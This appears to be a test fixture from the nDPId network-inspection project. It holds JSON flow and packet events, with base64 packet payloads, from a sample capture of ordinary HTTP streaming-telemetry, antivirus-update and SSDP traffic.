+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7560000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7560000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} +02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511fH70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} +02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1467353152692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353152692,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLGwAAAER1wTAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 